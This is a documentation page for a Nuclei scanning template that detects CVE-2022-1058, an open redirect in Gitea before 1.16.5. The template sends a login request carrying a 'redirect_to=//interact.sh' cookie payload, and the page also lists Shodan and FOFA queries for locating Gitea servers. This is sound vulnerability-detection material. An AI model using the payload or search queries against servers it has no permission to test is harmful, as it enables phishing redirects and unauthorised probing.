Skip to content
Nuclei Templates

Gitea <1.16.5 - Open Redirect

ID: CVE-2022-1058

Severity: medium

Author: theamanrawat

Tags: cve,cve2022,huntr,open-redirect,gitea

Description

Section titled “Description”

Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1058


info:
  name: Gitea <1.16.5 - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
  reference:
    - https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48
    - https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1058
    cwe-id: CWE-601
    epss-score: 0.001
    epss-percentile: 0.40832
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gitea
    product: gitea
    shodan-query:
      - title:"Gitea"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve,cve2022,huntr,open-redirect,gitea


http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: redirect_to=//interact.sh


        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}


    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "//interact.sh"


      - type: status
        status:
          - 302


    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="(.*)"'
        internal: true
# digest: 4a0a00473045022100caee168754629ced22374c5abbe6fcc9a6c0679963286316450bf9a516c9248e02207042d9e96eadd5ed6132e60aedfc9a8bfe6275b72d50fc7e54a4bd626a1f7509:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1058.yaml"

View on Github